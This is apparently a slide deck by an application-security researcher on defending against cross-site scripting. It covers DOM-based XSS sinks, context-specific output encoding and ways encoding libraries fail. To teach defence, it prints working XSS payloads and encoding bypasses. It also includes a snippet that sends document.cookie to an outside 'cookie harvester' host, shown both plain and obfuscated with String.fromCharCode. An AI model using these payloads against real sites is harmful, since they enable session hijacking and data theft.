You are on page 1of 35

Understanding XSS and Proper Output Encoding

By Abraham Kang Principal Security Researcher HP Fortify

Goals
Understand the Traditional and DOM based XSS threats Understand how to mitigate DOM based XSS Better understand the output encoding misuse cases If you need to understand traditional XSS see:
https://www.owasp.org/index.php/XSS_%28Cross _Site_Scripting%29_Prevention_Cheat_Sheet

XSS Threats
Session Cookie Theft and Hijacking Accessing Local Storage Key Logging Internal Network Scanning Targeted Drive-by Downloads A lot more bad stuff

Traditional XSS
Traditional XSS (Page Rendering Restructuring Attacks)
Injecting Up
<TITLE><%=request.getParameter("input")%></TITLE> Attacker passes in: <script>mal_code()</script> <INPUT name="full_name" value='<%=req.getParameter("full_name")%>' /> Attacker passes in: x' onblur="mal_code()" x='

Injecting Down
<a href='<%=req.getParameter("input")%>'></a> Attacker passes in: javascript:mal_code() or
vbscript:mal_code() data: or

Traditional 6 XSS Contexts


HTML
between HTML tags

CSS
between <style> tags or in style attribute of HTML tag

URL
HTML attribute which takes URL (src, href, backgroundUrl, etc.)

JavaScript Event Handler attributes


usually start with on* (i.e onload, onblur, onclick, etc.)

HTML Attribute
any attribute which is not a CSS or URL attribute (name, value, id, etc.)

JavaScript Body
in between <script> tags Mitigate by using the appropriate encoding for each context.

Review of DOM

window.location = userInput; document.forms*0+. i1.value = <%=req.getParameter(test)%>; document.getElementById(i1).value = Bob;

Whats Old is New


<DIV id=div1>HTML CONTEXT</DIV> document.getElementById(div1).innerHTML= input; <a id=a1 href="URL CONTEXT" >Test</a> document.getElementById(a1).href = input; <style>CSS CONTEXT</style> <div style="CSS CONTEXT" > document.body.style = input; <a id=a2 href="#" onclick="EVENT HANDLER CTX" document.getElementById(a2).setAttribute(onclick, input); <SCRIPT>JAVASCRIPT CONTEXT</SCRIPT> document.scripts[0].text = input; <INPUT type="text" name=i2" value="HTML ATTRIBUTE CONTEXT" /> document.forms[0].i2.value = input;

DOM Based XSS


Untrusted data is passed to/consumed by JavaScript methods which:
Render HTML through DOM methods(Subject to Page Rendering Restructuring Attacks) Pass untrusted data to code executing JS functions Pass untrusted data to traditional XSS contexts (represented in DOM) where the attribute datatype is a String Pass untrusted data to DOM methods which coerce strings into their native JS types

DOM Based XSS 1 (Rendering HTML)


Render HTML through HTML Rendering DOM methods(Subject to Page Rendering Restructuring Attacks)
buildEchoPage('<%=req.getParameter("input1")%>', '<%=req.getParameter("returnUrl")%>'); function buildEchoPage(input1, myURL) { document.write("<HTML><head><TITLE>Echo Page</TITLE></head>"); document.write("<body> Echo: " + input1); document.write("<a href=\"" + myURL + "\"> Return to home page </a> " + "</body></html>); }

element.innerHTML, element.outerHTML and document.writeln()

DOM Based XSS 1 (Rendering HTML)


Render HTML through HTML Rendering DOM methods(Subject to Page Rendering Restructuring Attacks)
buildEchoPage('<%= DefaultEncoder.encodeForJavascript( req.getParameter("input1"))%>', '<%= DefaultEncoder.encodeForJavascript( req.getParameter("returnUrl"))%>'); function buildEchoPage(input1, myURL) { document.write("<HTML><head><TITLE>Echo Page</TITLE></head>"); document.write("<body> Echo: " + input1); document.write("<a href=\"" + myURL + "\"> Return to home page </a> " + "</body></html>); }

Mitigating DOM Based XSS 1a


Do all encoding (server side) before placing data in page entry point
buildEchoPage('<%=DefaultEncoder.encodeForJavascript( DefaultEncoder.encodeForHTML( req.getParameter("input1")))%>', '<%=DefaultEncoder.encodeForJavascript( DefaultEncoder.encodeForURL(req.getParameter("returnUrl")))%>');

function buildEchoPage(input1, myURL) { document.write("<HTML><head><TITLE>Echo Page</TITLE></head>"); document.write("<body> Echo: " + input1)); document.write("<a href=\"" + myURL + "\"> Return to home page </a> " + "</body></html>); }

Mitigating DOM Based XSS 1b


Javascript encode (server side) before placing data in page entry point and HTML/URL encode within JavaScript
buildEchoPage('<%=DefaultEncoder.encodeForJavascript( req.getParameter("input1"))%>', '<%=DefaultEncoder.encodeForJavascript( req.getParameter("returnUrl"))%>'); function buildEchoPage(input1, myURL) { document.write("<HTML><head><TITLE>Echo Page</TITLE></head>"); document.write("<body> Echo: " + $ESAPI.encoder().encodeForHTML(input1)); document.write("<a href=\"" + $ESAPI.encoder().encodeForURL(myURL) + "\"> Return to home page </a> " + "</body></html>); }

DOM Based XSS 2 (code evaluating functions)


Pass untrusted data to code executing JS functions:
executeCode('<%=req.getParameter("user_input")%>'); function executeCode(input) {
eval(input); setTimeout(input, x); setInterval(input, x); new Function(input); scriptElement.text = input; defineSetter(x, eval); x=input; window[x](input) or top[x](input);

input.replace(/.+/, function($1) {//code which operates on $1})

Mitigating DOM Based XSS 2 (code evaluation)


Always delimit user input in between quotes ( and ) Dont execute script code from user input. Use a level of indirection between the contents of script code and user input. Limit left side operations
window[x] = input; or top[x] = input;

Use the appropriate layers of encoding or closures: setTimeout(customFunction(<%=doubleJavaScriptEncodedData%>, y)); function customFunction (name) { alert("Hello" + name); }

setTimeout((function(param) { return function() { customFunction(param); } })("<%=Encoder.encodeForJS(untrustedData)%>"), y);

DOM Based XSS 3 (Traditional Contexts)


Pass untrusted data to traditional XSS contexts where the attribute datatype is a String:
function buildLink() { document.body.style.backgroundImage = "url(vbscript:Alert(99))"; var linkTag = document.createElement("link"); linkTag.setAttribute("rel", "stylesheet"); linkTag.href = "data:,*%7bx:expression(alert(2))%7d"; //Works linkTag.href = "data:,%2a%7b%78%3a%65%78%70%72%65%73%73%69%6f%6e%28% 61%6c%65%72%74%28%32%29%29%7d"; //DOES WORK var anchorTag = document.createElement("a"); anchorTag.onmouseover = "alert(1)"; //DOES NOT WORK document.body.appendChild(anchorTag); }

Mitigating DOM Based XSS 3 (Traditional Contexts)


When setting DOM URL attributes:
URL encode the whole URL if you are using relative URLs. Ensure that the URL passed in starts with https:// and URL encode the rest of the string (if using absolute URLs). Use a level of indirection for CSS DOM attributes

DOM Based XSS 4 (through setAttribute)


Pass untrusted data to DOM methods which coerce strings into their native JS types:
function buildLink(input) { var linkTag = document.createElement("a"); linkTag.setAttribute("onclick", "alert(123)"); linkTag.setAttribute("onmouseover","alert(123)"); document.body.appendChild(linkTag); }

Mitigating DOM Based XSS 4 (through setAttribute)


Do not pass in user controlled script to execute within JavaScript event handlers Do not allow user controlled input to set the attribute name. Use the appropriate encoding for the value of the attribute Additional encoding for usage in function or encode in JS just before use.
linkTag.setAttribute("onmouseover, myJSFunc( <%=DefaultEncoder.encodeForJavascript( req.getParameter(name))%>));

DOM XSS 5 (in HTML attribute context)


Because the HTML attribute contexts inherently includes attributes which are not defined in URL, CSS, and event handler contexts their exploitability is limited. The one major exception is when setting the text node or attribute of a inherently dangerous HTML tag (<script>, <object>, etc.). /*Works in FF3.6 but not in IE8 */ s = document.createElement("script"); t = document.createTextNode("alert('textNode')"); s.appendChild(t); document.body.appendChild(s);

document.scripts[1].text = "alert('scripts[1]')";
Mitgation: Dont let users create SCRIPT elements.

DOM Based XSS 6 (Chameleon Context)


window[inputVar1] = inputVar2; top[inputVar1] = inputVar2;

Mitigation: Dont let users determine the attribute of objects (left side operations).

Problems Associated with Mitigating XSS Using Output Encoding


Understanding Characters Encoded by the Encoding Library Used by the Developer Understanding Encodings Result Side Effects of Encoding (Parser Ordering) Encoding Fails (CSS)

Characters Encoded by Encoding Library


<bean:write> and <c:out> ', ", <, >, & Apache StringEscapeUtils 2.0
escapeJavascript ', ", \ \, \, \\ but characters between 33 127 are left alone escapeHTML ", <, >, &

.NET HttpUtility ESAPI

", <, >, & All non-alpha

Encoding Semantics
HTML JavaScript URL CSS &lt; or &#999 or &#xfff; \x3c or \u003c %3c \3c or \(

Side Effects
Parsers ordering can effect escaped values meanings HTML Parser Runs first
Focused on HTML tags and attributes of those tags Only understands HTML escaping

Javascript, URL, and CSS parsers run afterwards with stuff given to it by the HTML parser.

The HTML parser will reverse encode

Reverse Encoding at Runtime

HTML encoding in event handlers onclick=&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29; //alert(1) WORKS HTML and URL encoding in URL attributes (after protocol: for URL encoding) href=&#x6a;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x7 0;&#x74;&#x3a;&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x31;&# x29; //alert(1) WORKS href = "data:,%2a%7b%78%3a%65%78%70%72%65%73%73%69%6f%6e% 28%61%6c%65%72%74%28%32%29%29%7d"; //DOES WORK

The JavaScript parser will reverse encode


URL encoding in URL attributes (after protocol: for URL encoding) The HTML encoded value attribute of HTML rendered page elements retrieved via DOM methods

Encoding Fail #1 (Wrong Encoding)


<SCRIPT> dofunc('<bean:write property="val1"/>','<c:out property="val2"/>); </SCRIPT>

', ", <, >, &

', ", <, >, &

<!DOCTYPE html> <HTML><BODY><script> <bean:write property=$,param.script}" /> </script></BODY></HTML>

', ", <, >, &

<SCRIPT> dofunc( '<bean:write property="val1" />','<c:out property="val2/>' ); </SCRIPT>

Encoding Fail #1 (Wrong Encoding Exploit)

val1 = \ val2 = , 1);attack_code();//


<SCRIPT>

dofunc( \, , 1);attack_code();//);
</SCRIPT> *Credit should be given to Jeremy Long for finding the exploit above

HTML5 automatically reverse HTML encodes characters in between the <script> tags at runtime.

Encoding Fail #2 (Parser Interaction)


<script> x = "<%=StringEscapeUtils.escapeJavascript( req.getParameter("input")) %>"; , , \ \, \, \\ </script>

<a href="#" onclick=" <%=StringEscapeUtils.escapeJavascript( req.getParameter("input")) %>" >

, , \ \, \, \\

Encoding Fail #2 (Parser exploit)


<script> x = "<%=JSEncodedInput%>"; </script>
<script> x = </script><script>attack_code() </script> <script>//"; </script>

<a href="#" onclick="<%=JSEncodedInput%>" >


<a href="#" onclick="\ onblur=attack_code() x=\" >

Encoding Fail #3 (Auto Reverse Escaping at Runtime)


<a href="#" onclick="jsfunc('<bean:write property="val1" />')" >

', ", <, >, &


<a href="javascript:jsfunc( <%=URLEncoder.encode(req.getParameter("input") )%>');" >

alphaNumeric stay same as well as . _ * <a href='<bean:write property="val1" />' >

', ", <, >, &

Encoding Fail #4 (Reverse Encoding upon DOM retrieval)


<form name="formName" > <input id="user_in" value="<c:out value='<%=req.getParameter("input")% >' />" />

', ", <, >, &

<script> var x = document.getElementById('user_in').value; document.write(x);

Encoding Fail #5 (HTML encoding everything upon input)


Some application frameworks will HTML encode all input coming into the application before it is retrieved by the application.

Where to encode then?

var stolenCookie = document.cookie; document.write("<img src=http://www.cookierHarvester.com/cookiereader .php?cookie=" + stolenCookie + "/>");

Black Lists Can Fail

Or
eval (String.fromCharCode( 118,97,114,32,115,116,111,108,101,110,67,111,111,107,10 5,101,32,61,32,100,111,99,117,109,101,110,116,46,99,111 ,111,107,105,101,59,100,111,99,117,109,101,110,116,46,1 19,114,105,116,101,40,8220,60,105,109,103,32,115,114,99 ,61,104,116,116,112,58,47,47,119,119,119,46,99,111,111, 107,105,101,114,72,97,114,118,101,115,116,101,114,46,99 ,111,109,47,99,111,111,107,105,101,114,101,97,100,101,1 14,46,112,104,112,63,99,111,111,107,105,101,61,8221,32, 43,32,99,111,111,107,105,101,32,43,32,8220,47,62,8221,4 1,59)) Just need ( ) . and comma

Conclusion
Use the correct encoding for the DOM Context you are placing data into Understand the characters encoded by the library you are using and how they apply to your context and the surrounding contexts Using the wrong encoding may still leave your app exploitable. Read the DOM XSS Cheat Sheet:
https://www.owasp.org/index.php/DOM_based_ XSS_Prevention_Cheat_Sheet

Questions and Credits


?
Special Thanks to Jim Manico (WhiteHat), Jacob West (Fortify), Brian Chess (Fortify), Gaz Hayes, Stefano Di Paola (Minded Security), Achim Hoffman, RSnake, Mario Heiderich, John Stevens (Cigital), Mike Samuel (Google), Arian Evans (WhiteHat), Himanshu Dwivedi and Alex Stamos (iSec Partners)

You might also like